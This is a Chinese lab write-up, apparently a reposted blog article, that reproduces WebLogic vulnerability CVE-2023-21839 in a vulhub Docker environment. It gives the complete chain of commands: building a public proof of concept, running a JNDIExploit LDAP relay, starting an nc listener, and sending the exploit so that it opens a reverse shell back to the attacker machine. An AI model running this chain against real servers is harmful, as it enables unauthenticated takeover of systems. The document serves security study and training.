CVE-2023-21839 【vulhub weblogic 漏洞复现】

admin 2024年10月21日22:50:03评论43 views字数 1882阅读6分16秒阅读模式

漏洞概述

由于Weblogic IIOP/T3协议存在缺陷,当IIOP/T3协议开启时,允许未经身份验证的攻击者通过IIOP/T3协议网络访问攻击存在安全风险的WebLogic Server,漏洞利用成功WebLogic Server可能被攻击者接管执行任意命令导致服务器沦陷或者造成严重的敏感数据泄露。

环境搭建  

contos7 (我的环境在)

进入环境  

CVE-2023-21839 【vulhub weblogic 漏洞复现】

启动容器  

docker-compose up -d//启动容器(绿色done代表启动成功)            
docker-compose ps -a//查看状态            

CVE-2023-21839 【vulhub weblogic 漏洞复现】

CVE-2023-21839 【vulhub weblogic 漏洞复现】

浏览访问  

靶机ip+分配端口/console

输入后等一会

地址:http://192.168.10.30:7001/console

CVE-2023-21839 【vulhub weblogic 漏洞复现】

漏洞复现  

poc地址:https://github.com/4ra1n/CVE-2023-21839

下载完,拖kali里面,解压  

unzip CVE-2023-21839-master.zip            

CVE-2023-21839 【vulhub weblogic 漏洞复现】

kali里面安装go环境  

apt install gccgo-go            
apt install golang-go            

进入poc环境   

CVE-2023-21839 【vulhub weblogic 漏洞复现】

编译  

go build -o CVE-2023-21839            

CVE-2023-21839 【vulhub weblogic 漏洞复现】

编译后

CVE-2023-21839 【vulhub weblogic 漏洞复现】

攻击命令  

(-ip和-port为靶机的IP和端口,-ldap里的IP都为攻击IP,前面的端口号是中转工具的默认端口,后面为导出的端口号)

./CVE-2023-21839 -ip 192.168.xxx.xx1 -port 7001 -ldap ldap://192.168.xxx.xx2:1389/Basic/ReverseShell/192.168.xxx.xx2/7892                    

中转工具  

JNDIExploit v1.4地址:

https://github.com/WhiteHSBG/JNDIExploit/releases/tag/v1.4

下载拖进kali里,解压

CVE-2023-21839 【vulhub weblogic 漏洞复现】

CVE-2023-21839 【vulhub weblogic 漏洞复现】

CVE-2023-21839 【vulhub weblogic 漏洞复现】

攻击  

(-i为攻击机IP)

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.xxx.xx            

开启中专工具监听  

java -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.10.55            

CVE-2023-21839 【vulhub weblogic 漏洞复现】

kali再开一个窗口开启监听  

nc -lvnp 7892            

CVE-2023-21839 【vulhub weblogic 漏洞复现】

kali再开一个窗口攻击  

./CVE-2023-21839 -ip 192.168.10.30 -port 7001 -ldap ldap://192.168.10.55:1389/Basic/ReverseShell/192.168.10.55/7892            

CVE-2023-21839 【vulhub weblogic 漏洞复现】

反弹shell   

CVE-2023-21839 【vulhub weblogic 漏洞复现】

后谈  

如果反弹不了,可能是java版本过高需要在java1.8的环境上运行

CVE-2023-21839 【vulhub weblogic 漏洞复现】

卸载原有java版本

apt-get remove openjdk*            
apt autoremove            

下载安装java1.8

下载链接:

https://repo.huaweicloud.com/java/jdk/8u202-b08/jdk-8u202-linux-x64.tar.gz

下载之后拖进kali里

tar -xzvf jdk-8u202-linux-x64.tar.gz//解压            
mv jdk1.8.0_202 /opt//移动            
           

进入对应路径

CVE-2023-21839 【vulhub weblogic 漏洞复现】

依次执行

export JAVA_HOME=/opt/jdk1.8.0_202            
export CLASSPATH=.:${JAVA_HOME}/lib            
export PATH=${JAVA_HOME}/bin:$PATH            
           
update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_202/bin/java 1            
update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_202/bin/javac 1            
update-alternatives --set java /opt/jdk1.8.0_202/bin/java            
update-alternatives --set javac /opt/jdk1.8.0_202/bin/javac            
java -version//完成查看版本            

CVE-2023-21839 【vulhub weblogic 漏洞复现】

原文始发于微信公众号(小白摸坑学网安):CVE-2023-21839 【vulhub weblogic 漏洞复现】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月21日22:50:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2023-21839 【vulhub weblogic 漏洞复现】http://cn-sec.com/archives/2493050.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息